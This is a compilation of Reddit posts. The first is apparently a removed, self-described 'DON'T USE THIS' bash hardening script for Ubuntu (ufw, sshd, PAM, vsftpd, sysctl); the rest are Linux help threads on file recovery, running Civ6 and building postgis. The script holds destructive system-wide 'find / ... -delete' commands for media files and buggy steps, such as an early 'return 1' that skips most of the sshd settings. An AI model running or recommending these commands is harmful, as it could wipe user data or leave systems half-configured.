read -r firewall_config
if [[ $firewall_config == "g" || $firewall_config == "G" ]]; then
echo "Opening gufw in 5 seconds..."
sleep 5
sudo gufw
elif [[ $firewall_config == "a" || $firewall_config == "A" ]]; then
sudo ufw enable
sudo ufw deny 23
sudo ufw deny 2049
sudo ufw deny 515
sudo ufw deny 111
sudo ufw deny 9051
sudo ufw deny 31337
sudo ufw status
echo "Automatic configuration of firewall completed. I recommend that you look over this again."
sleep 10
elif [[ $firewall_config == "ga" || $firewall_config == "GA" ]]; then
sudo ufw enable
sudo ufw deny 23
sudo ufw deny 2049
sudo ufw deny 515
sudo ufw deny 111
sudo ufw deny 9051
sudo ufw deny 31337
sudo gufw
else
echo "Error: bad input."
fi
clear
echo -en '\n'
echo "Running nmap on 127.0.0.1 to display open ports..." # nmap isn't considered a "hacking tool"
echo "Would you also like to save output to nmap_output.txt [y/n]?"
echo -en '\n'
read -r nmap_input
if [[ $nmap_input == "y" || $nmap_input == "Y" ]]; then
echo "Sending output to nmap_output.txt.."
touch nmap_output.txt
echo "Running nmap on localhost again so you can see the output."
nmap -sV 127.0.0.1 > nmap_output.txt
sleep 10
echo -en '\n'
elif [[ $nmap_input == "n" || $nmap_input == "N" ]]; then
echo "Understood. Running nmap on localhost.."
nmap -sV 127.0.0.1
sleep 10
echo -en '\n'
else
echo "Error: bad input."
echo -en '\n'
fi
echo "Now please disable unneeded processes keeping ports open."
sleep 5
sudo sysv-rc-conf # preferred tool for this
echo -en '\n'
echo "Please make sure there is nothing besides exit 0 and some comments."
sleep 5
sudo vim /etc/rc.local
echo -en '\n'
echo "Checking for sshd_config file"
if [ -f "$sshd" ]; then
echo "sshd is present on this system."
echo "Is sshd a critical service on this machine? [y/n]"
echo "note: selecting N will remove sshd from this system. Proceed with caution."
read -r sshd_critical
if [[ $sshd_critical == "y" || $sshd_critical == "Y" ]]; then
sshd_secure_config
elif [[ $sshd_critical == "n" || $sshd_critical == "N" ]]; then
echo "Understood, moving on."
else
echo "Error: bad input."
fi
echo -en '\n'
echo "Would you like to restart sshd? [y/n]"
read -r sshd_restart_uinput
if [[ $sshd_restart_uinput == "Y" || $sshd_restart_uinput == "y" ]]; then # may take points and then give back
echo "Restarting sshd..."
sudo service sshd restart
elif [[ $sshd_restart_uinput == "n" || $sshd_restart_uinput == "N" ]]; then
echo "Understood. Remember that changes will not happen until sshd is restarted."
else
echo "Error: bad input."
fi
fi
clear
echo -en '\n'
echo "Disabling guest user and turning off autologin. Editing /etc/lightdm/lightdm.conf"
echo "Checklist reference: GENERAL/8 Alpha, Bravo"
echo "Remember to restart lightdm or restart box later on."
echo "I will direct you there in 5 seconds."
sleep 5
sudo vim /etc/lightdm/lightdm.conf
echo -en '\n'
printf "Now, would you like for me to add some better settings for /etc/sysctl.conf? [y\n]"
read -r secure_sysctl
if [[ $secure_sysctl == "y" || $secure_sysctl == "Y" ]]; then
sysctl_secure_config
elif [[ $secure_sysctl == "n" || $secure_sysctl == "N" ]]; then
echo -en '\n'
echo "Understood, I recommend you do this manually however."
else
echo -en '\n'
echo "Error: bad input"
fi
echo -en '\n'
echo "Lock the root account? [y/n]"
read -r disable_root
echo -en '\n'
if [[ $disable_root == "y" || $disable_root == "Y" ]]; then
sudo passwd -l root
echo "Root account locked."
elif [[ $disable_root == "n" || $disable_root == "N" ]]; then
echo "Understood, manually lock please."
else
echo "Bad input."
fi
clear
echo -en '\n'
echo "Limit access to su to all users but the ones in group wheel? [y/n]"
echo -en '\n'
read -r lim_su
if [[ $lim_su == "y" || $lim_su == "Y" ]]; then
sudo chown [link]1 /bin/su sudo
chmod 04750 /bin/su
echo "Done."
elif [[ $lim_su == "n" || $lim_su == "N" ]]; then
echo "Remember to manually limit access to su! All it takes is a single uncomment..."
else
echo "Bad input."
fi
clear
if [[ -f "$apache_s" ]]; then
echo "Is apache2 supposed to be installed on this system? [y/n]"
echo "If you choose N then you will subsequently uninstall apache2. Be careful."
read -r apache2_que
if [[ $apache2_que == "y" || $apache2_que == "Y" ]]; then
echo "Understood, moving on to securing apache2."
apache2_secure
elif [[ $apache2_que == "n" || $apache2_que == "N" ]]; then
echo "Uninstalling apache2..."
sudo service apache2 stop
sudo apt-get purge apache2
else
echo "Bad input."
fi
else
echo "Apache2 is not installed, moving on."
fi
if [[ -f "$vsftpd_s" ]]; then
echo "vsftpd configuration file detected."
echo "Is vsftpd a critical service on this machine? [y/n]"
echo "If you choose N then you will subsequently uninstall vsftpd. Be careful."
read -r vsftpd_choice
if [[ $vsftpd_choice == "y" || $vsftpd_choice == "Y" ]]; then
echo "Understood, moving on to securing vsftpd."
vsftpd_secure
elif [[ $vsftpd_choice == "n" || $vsftpd_choice == "N" ]]; then
sudo service vsftpd stop
sudo apt-get purge vsftpd
else
echo "Bad input."
fi
else
echo "vsftpd is not installed on this machine, moving on."
fi
clear
echo "Check apparmor? [y/n]"
read -r apparmor_check
if [[ $apparmor_check == "y" || $apparmor_check == "Y" ]]; then
apparmor_fix
elif [[ $apparmor_check == "n" || $apparmor_check == "N" ]]; then
echo "Understood, moving on."
echo -en '\n'
else
echo "Error: bad input."
fi
echo -en '\n'
echo "Deny su to non admins? [y/n]"
echo -en '\n'
read -r deny_su
if [[ $deny_su == "y" || $deny_su == "Y" ]]; then
sudo dpkg-statoverride --update --add root sudo 4750 /bin/su
echo "Done."
elif [[ $deny_su == "n" || $deny_su == "N" ]]; then
sudo "Understood, moving on."
else
echo "Error: bad input."
fi
echo -en '\n'
echo "Secure home directory? [y/n]"
echo "NOTE: potentially dangerous."
echo -en '\n'
read -r home_secure
if [[ $home_secure == "y" || $home_secure == "Y" ]]; then
echo "What is your username?"
echo "I need it so I can chmod 0700 your home directory."
read -r username_uinput
sudo chmod 0700 /home/"$username_uinput"
echo "Thanks!."
elif [[ $home_secure == "n" || $home_secure == "N" ]]; then
echo "Understood, moving on."
else
echo "Error: bad input."
fi
clear
echo -en '\n'
echo "Prevent IP spoofing? [y/n]"
echo "(/etc/host.conf)"
read -r ip_spoof
echo -en '\n'
if [[ $ip_spoof == "y" || $ip_spoof == "Y" ]]; then
echo "order bind,hosts" | sudo tee -a /etc/host.conf
echo "nospoof on" | sudo tee -a /etc/host.conf
echo "IP spoofing disabled."
elif [[ $ip_spoof == "n" || $ip_spoof == "N" ]]; then
echo "Understood, skipping disabling ip spoofing."
else
echo "Error: bad input."
fi
echo "Would you like to edit /etc/pam.d? [y/n]"
read -r pam_secure
if [[ $pam_secure == "y" || $pam_secure == "Y" ]]; then
echo "Use subroutine pam_secure? [y/n]"
read -r choose_pam_secure
if [[ $choose_pam_secure == "y" || $choose_pam_secure == "Y" ]]; then
pam_secure
elif [[ $choose_pam_secure == "n" || $choose_pam_secure == "N" ]]; then
echo "Understood, moving on."
else
echo "Error: bad input."
fi
echo "Redirecting you to /etc/pam.d/common-password. Use checklist."
echo "Checklist reference: GENERAL/10 ALPHA"
echo -en '\n'
sleep 5
sudo vim /etc/pam.d/common-password
echo -en '\n'
echo "Redirecting you to /etc/pam.d/common-auth. Use checklist."
echo "Checklist reference: GENERAL/10 BRAVO"
sleep 5
sudo vim /etc/pam.d/common-auth
echo -en '\n'
echo "Redirecting you to /etc/login.defs. Use checklist."
echo "Checklist reference: GENERAL/10 CHARLIE"
sleep 5
sudo vim /etc/login.defs
elif [[ $pam_secure == "n" || $pam_secure == "N" ]]; then
echo "Understood, will skip securing pam.d. Make sure to use the checklist and do so manually."
else
echo "Sorry, bad input."
fi
clear
echo -en '\n'
echo "Would you like to delete media files? [y/n]"
echo "Warning: Feature untested due to obvious reasons."
echo -en '\n'
read -r media_input
if [[ $media_input == "y" || $media_input == "Y" ]]; then
sudo find / -name '*.mp3' -type f -delete
sudo find / -name '*.mov' -type f -delete
sudo find / -name '*.mp4' -type f -delete
sudo find / -name '*.avi' -type f -delete
sudo find / -name '*.mpg' -type f -delete
sudo find / -name '*.mpeg' -type f -delete
sudo find / -name '*.flac' -type f -delete
sudo find / -name '*.m4a' -type f -delete
sudo find / -name '*.flv' -type f -delete
sudo find / -name '*.ogg' -type f -delete
sudo find /home -name '*.gif' -type f -delete
sudo find /home -name '*.png' -type f -delete
sudo find /home -name '*.jpg' -type f -delete
sudo find /home -name '*.jpeg' -type f -delete
elif [[ $media_input == "n" || $media_input == "N" ]]; then
echo "Understood, manually search and destroy media files."
else
echo "Error: bad input."
fi
echo -en '\n'
clear
echo "Would you like to install updates? [y/n]"
read -r update_input
if [[ $update_input == "y" || $update_input == "Y" ]]; then
sudo apt-get -qq -y update
sudo apt-get -qq -y upgrade
sudo apt-get -qq -y dist-upgrade
sudo apt-get -qq -y autoremove
elif [[ $update_input == "n" || $update_input == "N" ]]; then
echo "Understood, moving on."
echo -en '\n'
else
echo "Error: bad input."
echo -en '\n'
fi
sudo freshclam
clear
echo "Run chkrootkit and rkhunter? [y/n]"
read -r rootkit_chk
if [[ $rootkit_chk == "y" || $rootkit_chk == "Y" ]]; then
touch rkhunter_output.txt
echo "Rkhunter output file created as rkhunter_output.txt."
touch chkrootkit_output.txt
echo "chkrootkit output file created as chkrootkit_output.txt."
sudo chkrootkit | tee chkrootkit_output.txt
sudo rkhunter -c | tee rkhunter_output.txt
elif [[ $rootkit_chk == "n" || $rootkit_chk == "N" ]]; then
echo "Understood, moving on."
else
echo "Error: bad input."
fi
sudo clamscan -r /
clear
echo -en '\n'
sleep 5
touch lynis_output.txt
echo "Lynis output file created as lynis_output.txt."
sudo lynis -c | tee lynis_output.txt
echo "Enable apparmor? [y/n]"
read -r apparmor_enabling
if [[ $apparmor_enabling == "y" || $apparmor_enabling == "Y" ]]; then
sudo perl -pi -e 's,GRUB_CMDLINE_LINUX="(.*)"$,GRUB_CMDLINE_LINUX="$1 apparmor=1 security=apparmor",' /etc/default/grub
sudo update-grub
elif [[ $apparmor_enabling == "n" || $apparmor_enabling == "N" ]]; then
echo "Understood, you should enable it however."
else
echo "Error: bad input."
fi
echo "The script has run it's course."
echo "Remember to manually check config files and finish any changes."
echo -en '\n'
echo "--------------------------------------------------------"
echo "INFORMATION"
echo "--------------------------------------------------------"
echo "Current User: $display_info"
echo "Current Time: $time"
echo "Kernel info: $kernel_info"
echo "--------------------------------------------------------"
echo -en '\n'
read -p "Press ENTER to reboot the system."
sudo reboot
}
function apache2_secure {
sudo apt-get -y install libapache2-modsecurity
sudo apt-get -y install libapache2-modevasive
sudo sed -i 's/^#?ServerSignature .*/ServerSignature Off/g' /etc/apache2/conf-enabled/security.conf
sudo sed -i 's/^#?ServerTokens .*/ServerTokens Off/g' /etc/apache2/conf-enabled/security.conf
sudo sed -i 's/^#?Options .*/Options None/g' /etc/apache2/apache2.conf
sudo sed -i 's/^#?AllowOverride .*/AllowOverride None/g' /etc/apache2/apache2.conf
sudo sed -i 's/^#?Require*/Require all granted/g' /etc/apache2/apache2.conf
sudo sed -i 's/^#?LimitRequestBody*/LimitRequestBody 204800/g' /etc/apache2/apache2.conf
echo "" | sudo tee -a /etc/apache2/apache2.conf
echo "Order deny, allow" | sudo tee -a /etc/apache2/apache2.conf
echo "Deny from all" | sudo tee -a /etc/apache2/apache2.conf
echo "Check if mod_security module is running..."
echo "
" | sudo tee -a /etc/apache2/apache2.conf
sudo sed -i 's/^#?Timeout*/Timeout 15/g' /etc/apache2/apache2.conf
sudo sed -i 's/^#?LimitXMLRequestBody*/LimitXMLRequestBody 204800/' /etc/apache2/apache2.conf
sudo apachectl -M | grep --color security
echo "Is mod_security on? It should say security2_module somewhere."
read -r security_a2_on
if [[ $security_a2_on == "y" || $security_a2_on == "Y" ]]; then
echo "Good. I will move on."
elif [[ $security_a2_on == "n" || $security_a2_on == "N" ]]; then
sudo mv /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
sudo sed -i 's/^#?SecRuleEngine .*/SecRuleEngine On/g' /etc/modsecurity/modsecurity.conf
sudo service apache2 restart
else
echo "Error: bad input."
fi
return 1
}
function pam_secure {
sudo sed -i 's/^#?PASS_MAX_DAYS .*/PASS_MAX_DAYS 90/g' /etc/login.defs
sudo sed -i 's/^#?PASS_MIN_DAYS .*/PASS_MIN_DAYS 7/g' /etc/login.defs
sudo sed -i 's/^#?PASS_WARN_AGE .*/PASS_WARN_AGE 7/g' /etc/login.defs
echo "Setup failed login attempts in /etc/pam.d/common-auth and add some config changes? [y/n]"
read -r fail_pamd_ca
if [[ $fail_pamd_ca == "y" || $fail_pamd_ca == "Y" ]]; then
echo "auth optional pam_tally.so deny=5 unlock_time=900 onerr=fail audit even_deny_root_account silent" | sudo tee -a /etc/pam.d/common-auth
sudo sed -i 's/^#?pam_unix.so .*/password [success=1 default=ignore] pam_unix.so obscure use_authtok try_first_pass sha512
remember=10 minlen=8 difok=5/g' /etc/pam.d/common-password
elif [[ $fail_pamd_ca == "n" || $fail_pamd_ca == "N" ]]; then
echo "Understood, moving on."
else
echo "Error: bad input."
fi
echo "Create brutally paranoid configuration for /etc/pam.d/other? [y/n]"
echo "NOTE: IF PAM FILES ARE DELETED ACCIDENTALLY, SYSTEM FAILURE MAY OCCUR."
read -r other_paranoid
if [[ $other_paranoid == "y" || $other_paranoid == "Y" ]]; then
echo "auth required pam_deny.so" | sudo tee -a /etc/pam.d/other
echo "auth required pam_warn.so" | sudo tee -a /etc/pam.d/other
echo "account required pam_deny.so" | sudo tee -a /etc/pam.d/other
echo "account required pam_warn.so" | sudo tee -a /etc/pam.d/other
echo "password required pam_deny.so" | sudo tee -a /etc/pam.d/other
echo "password required pam_warn.so" | sudo tee -a /etc/pam.d/other
echo "session required pam_deny.so" | sudo tee -a /etc/pam.d/other
echo "session required pam_warn.so" | sudo tee -a /etc/pam.d/other
elif [[ $other_paranoid == "n" || $other_paranoid == "N" ]]; then
echo "Understood, moving on."
else
echo "Error: bad input."
fi
return 1
}
function vsftpd_secure {
sudo sed -i 's/^anonymous_enable=.*/anonymous_enable=NO/g' /etc/vsftpd.conf
echo "Anonymous FTP login disabled."
sudo sed -i 's/^chroot_local_user=.*/chroot_local_user=YES/g' /etc/vsftpd.conf
echo "Local users restricted to their home directories."
echo "Create SSL/TLS certificate and private key for vsftpd server? [y/n]"
read -r ssl_vsftpd
if [[ $ssl_vsftpd == "y" || $ssl_vsftpd == "Y" ]]; then
sudo openssl req -x509 -days 365 -newkey [link]2 -nodes -keyout /etc/vsftpd.pem -out /etc/vsftpd.pem
echo "Created."
echo "Making config changes..."
sudo sed -i 's/^#?ssl_enable=.*/ssl_enable=YES/g' /etc/vsftpd.conf #enable tls/ssl
echo "SSL enabled."
sudo sed -i 's/^#?allow_anon_ssl=.*/allow_anon_ssl=NO/g' /etc/vsftpd.conf
sudo sed -i 's/^#?force_local_data_ssl=.*/force_local_data_ssl=YES/g' /etc/vsftpd.conf
sudo sed -i 's/^#?force_local_logins_ssl=.*/force_local_logins_ssl=YES/g' /etc/vsftpd.conf
sudo sed -i 's/^#?ssl_tlsv1=.*/ssl_tlsv1=YES/g' /etc/vsftpd.conf
sudo sed -i 's/^#?ssl_sslv2=.*/ssl_sslv2=NO/g' /etc/vsftpd.conf
sudo sed -i 's/^#?ssl_sslv3=.*/ssl_sslv3=NO/g' /etc/vsftpd.conf
sudo sed -i 's/^#?require_ssl_reuse=.*/require_ssl_reuse=NO/g' /etc/vsftpd.conf
sudo sed -i 's/^#?ssl_ciphers=.*/ssl_ciphers=HIGH/g' /etc/vsftpd.conf
sudo sed -i 's/^#?rsa_cert_file=.*/rsa_cert_file=/etc/vsftpd.pem/g' /etc/vsftpd.conf
sudo sed -i 's/^#?rsa_private_key_file=.*/rsa_private_key_file=/etc/vsftpd.pem/g' /etc/vsftpd.conf
sudo sed -i 's/^#?pasv_max_port=.*/pasv_max_port=65535/g' /etc/vsftpd.conf
sudo sed -i 's/^#?pasv_min_port=.*/pasv_min_port=64000/g' /etc/vsftpd.conf
sudo sed -i 's/^#?local_max_rate=.*/local_max_rate=30000/g' /etc/vsftpd.conf
sudo sed -i 's/^#?idle_session_timeout=.*/idle_session_timeout=120/g' /etc/vsftpd.conf
sudo sed -i 's/^#?max_per_ip=.*/max_per_ip=15/g' /etc/vsftpd.conf
sudo sed -i 's/^#?xferlog_enable=.*/xferlog_enable=YES/g' /etc/vsftpd.conf
sudo sed -i 's/^#?xferlog_std_format=.*/xferlog_std_format=NO/g' /etc/vsftpd.conf
sudo sed -i 's/^#?xferlog_file=.*/xferlog_file=/valog/vsftpd.log/g' /etc/vsftpd.conf
echo "Log file set at /valog/vsftpd.log"
sudo sed -i 's/^#?log_ftp_protocol=.*/log_ftp_protocol=YES/g' /etc/vsftpd.conf
sudo sed -i 's/^#?debug_ssl=.*/debug_ssl=YES/g' /etc/vsftpd.conf
echo "Configuration changes complete. Check /etc/vsftpd.conf later to see if they have all been done."
echo -en '\n'
echo "[link]3 "
echo -en '\n'
echo "Adding firewall exceptions.."
sudo ufw allow 20
sudo ufw allow 21
sudo ufw allow 64000:65535/tcp
sudo iptables -I INPUT -p tcp --dport 64000:65535 -j ACCEPT
elif [[ $ssl_vsftpd == "n" || $ssl_vsftpd == "N" ]]; then
echo "Understood. However, this is recommended."
else
echo "Error: bad input."
fi
echo "Restart vsftpd? [y/n]"
read -r vsftpd_restart
if [[ $vsftpd_restart == "y" || $vsftpd_restart == "Y" ]]; then
sudo service vsftpd restart
elif [[ $vsftpd_restart == "n" || $vsftpd_restart == "N" ]]; then
echo "Understood, moving on."
else
echo "Error: bad input."
fi
return 1
}
function apparmor_fix {
if [ -f /ussbin/apparmor_status ]; then
echo "Apparmor already installed."
else
echo "Apparmor not installed, installing."
sudo apt-get install -y -qq apparmor apparmor-profiles apparmor-utils
echo "Apparmor will be enabled at the end of the script."
fi
return 1
}
function sshd_secure_config {
sudo sed -i 's/^#?PermitRootLogin .*/PermitRootLogin no/' /etc/ssh/sshd_config
return 1
sudo sed -i 's/^#?PermitEmptyPasswords .*/PermitEmptyPasswords no/' /etc/ssh/sshd_config
sudo sed -i 's/^#?Port .*/Port 2223/' /etc/ssh/sshd_config
sudo sed -i 's/^#?X11Forwarding .*/X11Forwarding no/' /etc/ssh/sshd_config
sudo ufw allow 2223
sudo sed -i 's/^#?Protocol .*/Protocol 2/' /etc/ssh/sshd_config
sudo sed -i 's/^#?PrintLastLog .*/PrintLastLog no/' /etc/ssh/sshd_config
sudo sed -i 's/^#?IgnoreRhosts .*/IgnoreRhosts yes/' /etc/ssh/sshd_config
sudo sed -i 's/^#?RhostsAuthentication .*/RhostsAuthentication no/' /etc/ssh/sshd_config
sudo sed -i 's/^#?RSAAuthentication .*/RSAAuthentication yes/' /etc/ssh/sshd_config
sudo sed -i 's/^#?HostbasedAuthentication .*/HostbasedAuthentication no/' /etc/ssh/sshd_config
sudo sed -i 's/^#?LoginGraceTime .*/LoginGraceTime 60/' /etc/ssh/sshd_config
sudo sed -i 's/^#?MaxStartups .*/MaxStartups 4/' /etc/ssh/sshd_config
echo "Automatic configuration complete."
sudo sed -i 's/^#?LogLevel .*/LogLevel VERBOSE/' /etc/ssh/sshd_config
echo "ClientAliveInterval 300" | sudo tee -a /etc/ssh/sshd_config
echo "ClientAliveCountMax 0" | sudo tee -a /etc/ssh/sshd_config
sudo sed -i 's/^#?StrictModes .*/StrictModes yes/' /etc/ssh/sshd_config
clear
echo "Use iptables to try to prevent bruteforcing? [y/n]"
read -r iptable_ssh
if [[ $iptable_ssh == "y" || $iptable_ssh == "Y" ]]; then
iptables -A INPUT -p tcp --dport 2223 -m state --state NEW -m recent --set --name ssh --rsource
iptables -A INPUT -p tcp --dport 2223 -m state --state NEW -m recent ! --rcheck --seconds 60 --hitcount 4 --name ssh --rsource -j ACCEPT
echo "Done."
elif [[ $iptable_ssh == "n" || $iptable_ssh == "N" ]]; then
echo "Understood, moving on."
else
echo "Error: bad input."
fi
echo "Use public/private keys for authentication instead of passwords? [y/n]"
read -r auth_private
if [[ $auth_private == "y" || $auth_private == "Y" ]]; then
sudo ssh-keygen -t rsa
clear
sudo chmod 700 ~/.ssh
sudo chmod 600 ~/.ssh/id_rsa
cat id_rsa.pub >> ~/.ssh/authorized_keys
sudo chmod 600 ~/.ssh/authorized_keys
restorecon -Rv ~/.ssh
sudo sed -i 's/^#?PasswordAuthentication .*/PasswordAuthentication no/' /etc/ssh/sshd_config
elif [[ $auth_private == "n" || $auth_private == "N" ]]; then
echo "Understood, moving on."
else
echo "Error: bad input."
fi
return 1
}
function sysctl_secure_config {
echo "kernel.sysrq = 0" | sudo tee -a /etc/sysctl.conf
echo "net.ipv4.conf.all.accept_source_route = 0" | sudo tee -a /etc/sysctl.conf
echo "net.ipv4.conf.all.accept_redirects = 0" | sudo tee -a /etc/sysctl.conf
echo "net.ipv4.conf.all.rp_filter = 1" | sudo tee -a /etc/sysctl.conf
echo "net.ipv4.conf.all.log_martians = 1" | sudo tee -a /etc/sysctl.conf
echo "net.ipv4.icmp_ignore_bogus_error_responses = 1" | sudo tee -a /etc/sysctl.conf
echo "net.ipv4.icmp_echo_ignore_all = 1" | sudo tee -a /etc/sysctl.conf
echo "net.ipv4.icmp_echo_ignore_broadcasts = 1" | sudo tee -a /etc/sysctl.conf
echo "net.ipv4.tcp_syncookies=1" | sudo tee -a /etc/sysctl.conf
clear
echo -en '\n'
echo "Disable IPv6? [y/n]"
echo -en '\n'
read -r ipv6_disable
if [[ $ipv6_disable == "y" || $ipv6_disable == "Y" ]]; then
echo "net.ipv6.conf.all.disable_ipv6 = 1" | sudo tee -a /etc/sysctl.conf
echo "net.ipv6.conf.default.disable_ipv6 = 1" | sudo tee -a /etc/sysctl.conf
echo "net.ipv6.conf.lo.disable_ipv6 = 1" | sudo tee -a /etc/sysctl.conf
echo "IPv6 disabled."
elif [[ $ipv6_disable == "n" || $ipv6_disable == "N" ]]; then
echo "Understood, skipping disabling IPv6."
else
echo "Error: bad input."
fi
return 1
}
if [ "$(id -u)" != "0" ]; then
echo "Please run this script as root. I promise I won't dd /dev/urandom into /dev/sda..."
exit
else
main
fi
'''
DON'T USE THIS
Go1dfish undelete link
unreddit undelete link
Author: CreeperTyE
1: root:admin 2: rsa:2048 3: *modulo.co*/*e*u*e-ftp*s*rvi*e-v*ftp*-linux*ht*l
Unknown links are censored to prevent spreading illicit content.
submitted by removalbot to removalbot [link] [comments]

Need help finding files by byte data.

Hi, I recently mistakenly deleted an entire partition where I had Mint installed. I'm using Manjaro, so what I deleted wasn't super important but there's still a couple of files I'd rather get back.
Since I didn't write anything on top of it, I think I recovered all of the data with PhotoRec (at least a very large ammount of it). But problem: All folders have random names, and all files have random names too. What's worse: there's no file structure anymore, everything's scrambled.
So I have around 60GB of crap where there used to be an OS and I don't know what anything is. I managed to find a specific txt with grep because I remembered one string inside it. However, now I want to find a binary file, more specifically the nprofile file, which is my save file for N++. If you're at all familiar with this game, you'll know it's fucking hard, and that it takes a lot of effort. You may also know that Steam Cloud (for this game) is screwed, and likes to corrupt this file, so I disabled it for this game, as recommended (because it already corrupted it once). So, here's some info about the file that I guess should be enough to find it, but I don't know how to do it.
That's all I know about it... Is there any way to search for these patterns with grep or other way?
submitted by SnooPets20 to linuxquestions [link] [comments]

Civilization 6 on Ubuntu 16.04 - Finally made it work!

I write with tears of joy. I finally were able to run CIV 6. You Windows guys may not know but for me and many others it is a real struggle to make Civ run on Linux. After switching from Windows to Ubuntu 18.04 two years ago it took many tries and hours (so I did not keep track over everything which did/did not work). However, here is a collection of things I did to make it run:
  1. Since it didnt run on Ubunt 18.04 I installed Ubuntu 16.04 on a separate partition/disk (no need to replace the current linux distro) and created a dual-boot.
  2. Installing Steam and Civ6 ( Steam didnt start correctly)
  3. Changing Launcher File sudo nano ~/.steam/steam/steamapps/common/Sid\ Meier\'s\ Civilization\ VI/Civ6 and edit "Civ6" file and change the line "./GameGuide/Civ6" to "./Civ6Sub". The path might be different in your system. Credit to zb2ooby on https://steamcommunity.com/app/289070/discussions/3/1777136225033825119/
  4. I was able to start Civ now but it did not start a game correctly. Always freezed or similiar. It also did not make use of my graphics card. Could not change it via the interface. I installed NVIDIA binary driver - version 384.130 from nvidia-384(propretary) with sudo apt-get install nvidia-384 . It is not the newest driver, I tried newer ones but it did not work with Ubuntu 16.04 and my graphics GTX 1060 (https://wiki.ubuntuusers.de/Grafikkarten/Nvidia/nvidia/#Links). Reboot the system afterwards.
  5. Then I couldn't start Steam again. Error Message: glXChooseVisual Failed. I used the following commands from here to solve this. sudo ldconfig -p | grep -i gl.so sudo rm /uslib/i386-linux-gnu/mesa/libGL.so.1
  6. Now I was able to play Civ 6! Still, the graphics card option did not show in the game but I could tell that I used my graphics card. I am sorry for being a little bit unorganized. Maybe you or the future me can get some advise from this.
My system: Ubuntu 16.04 Processor: Intel® Core™ i5-7400 CPU @ 3.00GHz × 4 Graphics: GeForce GTX 1060 3GB/PCIe/SSE2 64-bit
submitted by meankimia to CivVI [link] [comments]

Issue when compiling postgis from source

Hello right now i'm using Solus. Because there are no compiled version of postgis for Solus, i have no option other than building it from source
as for note i have installed all of the requirement GDAL, PROJ, GEOS, JSON-C, and LIBXML2 (including the devel one)
but when i run configure, it says that it could not find libxml2
here are the full configure output
checking for a BSD-compatible install... /usbin/install -c checking build system type... x86_64-pc-linux-gnu checking host system type... x86_64-pc-linux-gnu checking how to print strings... printf checking for gcc... gcc checking whether the C compiler works... yes checking for C compiler default output file name... a.out checking for suffix of executables... checking whether we are cross compiling... no checking for suffix of object files... o checking whether we are using the GNU C compiler... yes checking whether gcc accepts -g... yes checking for gcc option to accept ISO C89... none needed checking for a sed that does not truncate output... /bin/sed checking for grep that handles long lines and -e... /bin/grep checking for egrep... /bin/grep -E checking for fgrep... /bin/grep -F checking for ld used by gcc... /usbin/ld checking if the linker (/usbin/ld) is GNU ld... yes checking for BSD- or MS-compatible name lister (nm)... /usbin/nm -B checking the name lister (/usbin/nm -B) interface... BSD nm checking whether ln -s works... yes checking the maximum length of command line arguments... 1572864 checking how to convert x86_64-pc-linux-gnu file names to x86_64-pc-linux-gnu format... func_convert_file_noop checking how to convert x86_64-pc-linux-gnu file names to toolchain format... func_convert_file_noop checking for /usbin/ld option to reload object files... -r checking for objdump... objdump checking how to recognize dependent libraries... pass_all checking for dlltool... no checking how to associate runtime and link libraries... printf %s\n checking for ar... ar checking for archiver @FILE support... @ checking for strip... strip checking for ranlib... ranlib checking for gawk... gawk checking command to parse /usbin/nm -B output from gcc object... ok checking for sysroot... no checking for a working dd... /bin/dd checking how to truncate binary pipes... /bin/dd bs=4096 count=1 checking for mt... mt checking if mt is a manifest tool... no checking how to run the C preprocessor... gcc -E checking for ANSI C header files... yes checking for sys/types.h... yes checking for sys/stat.h... yes checking for stdlib.h... yes checking for string.h... yes checking for memory.h... yes checking for strings.h... yes checking for inttypes.h... yes checking for stdint.h... yes checking for unistd.h... yes checking for dlfcn.h... yes checking for objdir... .libs checking if gcc supports -fno-rtti -fno-exceptions... no checking for gcc option to produce PIC... -fPIC -DPIC checking if gcc PIC flag -fPIC -DPIC works... yes checking if gcc static flag -static works... yes checking if gcc supports -c -o file.o... yes checking if gcc supports -c -o file.o... (cached) yes checking whether the gcc linker (/usbin/ld -m elf_x86_64) supports shared libraries... yes checking whether -lc should be explicitly linked in... no checking dynamic linker characteristics... GNU/Linux ld.so checking how to hardcode library paths into programs... immediate checking whether stripping libraries is possible... yes checking if libtool supports shared libraries... yes checking whether to build shared libraries... yes checking whether to build static libraries... yes checking for gcc... (cached) gcc checking whether we are using the GNU C compiler... (cached) yes checking whether gcc accepts -g... (cached) yes checking for gcc option to accept ISO C89... (cached) none needed checking how to run the C preprocessor... gcc -E checking for grep that handles long lines and -e... (cached) /bin/grep checking for cpp... /usbin/cpp checking if gcc supports -Wall... yes checking if gcc supports -Wmissing-prototypes... yes checking if gcc supports -ffloat-store... yes checking if gcc supports --exclude-libs... yes checking for flex... flex checking lex output file root... lex.yy checking lex library... -lfl checking whether yytext is a pointer... yes checking for bison... bison -y checking ieeefp.h usability... no checking ieeefp.h presence... no checking for ieeefp.h... no checking termios.h usability... yes checking termios.h presence... yes checking for termios.h... yes checking for vasprintf... yes checking for asprintf... yes checking for _LARGEFILE_SOURCE value needed for large files... no checking whether isfinite is declared... yes checking whether isfinite is declared... yes checking for perl... /usbin/perl checking for xsltproc... /usbin/xsltproc checking for convert... /usbin/convert checking for dblatex... no configure: WARNING: dblatex is not installed so PDF documentation cannot be built checking for xmllint... /usbin/xmllint configure: WARNING: could not locate Docbook stylesheets required to build the documentation checking CUnit/CUnit.h usability... no checking CUnit/CUnit.h presence... no checking for CUnit/CUnit.h... no configure: WARNING: could not locate CUnit required for unit tests checking iconv.h usability... yes checking iconv.h presence... yes checking for iconv.h... yes checking for libiconv_open in -liconv... no checking for iconv_open in -lc... yes checking for iconvctl... no checking for libiconvctl... no checking for pg_config... /usbin/pg_config checking PostgreSQL version... PostgreSQL 10.12 checking libpq-fe.h usability... yes checking libpq-fe.h presence... yes checking for libpq-fe.h... yes checking for PQserverVersion in -lpq... yes checking for xml2-config... /usbin/xml2-config checking libxml/tree.h usability... yes checking libxml/tree.h presence... yes checking for libxml/tree.h... yes checking libxml/parser.h usability... yes checking libxml/parser.h presence... yes checking for libxml/parser.h... yes checking libxml/xpath.h usability... yes checking libxml/xpath.h presence... yes checking for libxml/xpath.h... yes checking libxml/xpathInternals.h usability... yes checking libxml/xpathInternals.h presence... yes checking for libxml/xpathInternals.h... yes checking for xmlInitParser in -lxml2... no configure: error: could not find libxml2 
Is there anyone having the solution for this issue?
submitted by Smooth-Efficiency-51 to postgis [link] [comments]

Kodi "GPU at BusId 0x1 doesn't have a supported video decoder" workaround?

